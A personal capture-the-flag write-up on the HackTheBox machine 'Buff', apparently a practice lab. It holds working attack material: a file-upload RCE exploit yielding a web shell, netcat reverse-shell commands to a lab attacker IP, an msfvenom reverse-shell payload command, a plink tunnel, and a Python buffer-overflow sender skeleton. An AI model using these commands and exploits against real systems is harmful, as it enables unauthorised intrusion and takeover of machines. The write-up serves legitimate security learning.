Buff (HTB)

first hackthebox machine :) I've been loyal to tryhackme for a while but it's time to expand my learning resources

HackTheBox Buff Write-Up

topics: web application security, Windows privilege escalation, port forwarding, public exploits, buffer overflows

  1. Enumeration

  2. Local Privilege Escalation

  3. Administrator Privilege Escalation

new tools: plink

tools: nmapAutomator, dirsearch, searchsploit, curl, python, msfvenom

Enumeration

Initial nmap scan: ./nmapAutomator.sh $ip Basic

Only one port is open: 8080 (http-alt), running Apache httpd 2.4.43 (Win64). The http-title is mrb3n's Bro Hut, so mrb3n is a likely username to keep in mind. Let's run a vulnerability scan and visit the homepage.

./nmapAutomator.sh $ip Vulns

python3 dirsearch.py -u $ip -e php,html,txt

dirsearch finds several paths that are not linked from the homepage, including upload.php and register.php, which are obvious candidates for getting a shell onto the box. I didn't find anything on my initial inspection of the visible tabs on the homepage, so let's visit some of these pages.

I visited upload.php first, as it could potentially be the fastest way to achieve a shell.

The page throws an error: the source contains a PHP notice about an unrecognised parameter, id. An upload handler that takes a name or path from a request parameter is a classic spot for file inclusion or an arbitrary file upload, so it's worth finding out what the site was built with before poking at it blindly. We already know the web server is Apache; let's identify the application running on it.

Checking the main tabs on the homepage one more time, the contact.php page shows the following message, which names the platform the site was built with: Gym Management Software.

Local Privilege Escalation

Let's use searchsploit to search for Gym Management Software.

The top hit is a Python script, 48506.py, for a remote code execution bug in that software. Inspecting it shows how the RCE works.

python /usr/share/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/

The exploit abuses the upload handler's file-type check. It sends a multipart POST to upload.php with id=kamehameha in the query string and a file named kamehameha.php.png, sent with Content-Type image/png and starting with PNG magic bytes. The check is satisfied by the image-looking name, header and content type, but the handler builds the stored name from the id value and the first extension of the double extension, so the file lands as upload/kamehameha.php. Its body is a PHP one-liner that passes the telepathy GET parameter to shell_exec. The script then loops over our input, sends each command through that parameter and prints the response, so what we have is a web shell, not an interactive one. We'll want to upgrade it to a more stable reverse shell.

The exploit output gives the URL for interacting with the shell: /upload/kamehameha.php?telepathy=<command>. Let's stage a netcat binary on the box and use it to send cmd.exe back to us.

On the attacker side, copy nc.exe into the working directory and start a Python HTTP server there. On the victim, download it with curl and write it out as nc.exe. Start a listener on the chosen port, then request "http://10.10.10.198:8080/upload/kamehameha.php?telepathy= nc.exe 10.10.15.16 4445 -e cmd.exe" in the browser (the browser URL-encodes the spaces; the request will hang for as long as the reverse shell is alive, which is expected).

Administrator Privilege Escalation

Let's find out the OS architecture of the machine so we transfer and run the right winPEAS build.

wmic OS get OSArchitecture

We are unable to transfer the file with smbserver, so let's try certutil.

Both of our usual file-transfer methods on Windows are blocked (curl still works, as it did for nc.exe). Let's enumerate the user folders for something immediate before trying to run a privesc script.

There is nothing else in the Desktop folder besides the user flag. There was a batch file in the Documents folder, but based on its contents I'm assuming it's part of the website platform.

There is an executable in the Downloads folder; searching its name with searchsploit immediately turns up a buffer overflow exploit.

The exploit is written in Python, but Python is not installed on the victim, and the vulnerable service listens only on the victim's loopback (127.0.0.1:8888). So we run the exploit from Kali and tunnel that port back to us with a reverse port forward. plink (PuTTY's command-line SSH client) can do this; the default plink on Kali is outdated, so grab a current Windows build. Two caveats: an SSH server must be running on Kali, and the SSH password goes on the victim's command line in plaintext, so use a throwaway account. Transfer plink.exe from Kali through the original shell (curl again) and run the command below. On first connect plink asks to cache Kali's host key; the shell is not interactive, so answer by piping echo y into it.

plink.exe -l kali -pw kali 10.10.15.16 -R 8888:127.0.0.1:8888

The exploit script includes the msfvenom command used to generate its payload. We already have nc.exe on the box, so use a reverse shell through it as the CMD, and keep the bad-character list (-b) from the script. windows/exec is an x86 payload; that is fine here even though the OS is 64-bit, because what matters is the architecture of the vulnerable process.

msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.15.16 4444' -b '\x00\x0a\x0d' -f py -v payload

Replace the payload variable in 48389.py with the msfvenom output, start a listener on 4444, and run the exploit from Kali against 127.0.0.1:8888 (the plink tunnel carries it to the victim's loopback port). The shell comes back as the user running the service, in this case Administrator.
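The shape of that exploit, with the msfvenom output dropped in and a bad-character check before anything is sent. This is an added example for this write-up, not the ExploitDB script itself. The offset to EIP, the JMP ESP address and the NOP-sled length are placeholders (assumed values for illustration; take the real ones from 48389.py), and the stand-in shellcode is int3 bytes so the buffer layout can be verified without real shellcode. It is meant to run from Kali against 127.0.0.1:8888 once the plink reverse forward is up.

```python
"""Stack-overflow sender in the shape of 48389.py (added example)."""
import socket
import struct

BAD_CHARS = b"\x00\x0a\x0d"   # the -b list handed to msfvenom
OFFSET = 1000                 # placeholder (assumed): bytes before EIP is overwritten
JMP_ESP = 0x41414141          # placeholder (assumed): address of a JMP ESP gadget
NOP_SLED = 16                 # placeholder (assumed): NOPs between EIP and shellcode

# Replace with the output of:
#   msfvenom -p windows/exec CMD='...' -b '\x00\x0a\x0d' -f py -v payload
# Stand-in: int3 instructions, so a debugger attached to the service would break.
payload = b"\xcc" * 16


def find_bad_chars(buf, bad=BAD_CHARS):
    """Return the bad characters present in buf; empty means the shellcode is clean."""
    return bytes(sorted(set(buf) & set(bad)))


def build_buffer(shellcode, offset=OFFSET, ret=JMP_ESP, sled=NOP_SLED):
    """padding | EIP (little-endian) | NOP sled | shellcode.

    Refuses to build if msfvenom's encoder left a bad char in, since the
    service would truncate or mangle the buffer at that byte.
    """
    present = find_bad_chars(shellcode)
    if present:
        raise ValueError(f"shellcode contains bad chars: {present!r}")
    eip = struct.pack("<I", ret)  # x86 is little-endian: 0xdeadbeef -> ef be ad de
    return b"\x90" * offset + eip + b"\x90" * sled + shellcode


def send_buffer(buf, host="127.0.0.1", port=8888, timeout=5):
    """Deliver the buffer over the tunnel; a refused connection means plink is not up."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(buf)


if __name__ == "__main__":
    buf = build_buffer(payload)
    print(f"sending {len(buf)} bytes, EIP overwritten at offset {OFFSET}")
    send_buffer(buf)
```

If send_buffer raises ConnectionRefusedError, nothing is listening on Kali's 8888 yet: the plink session has not established the -R forward, or it was rejected because the SSH login failed.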
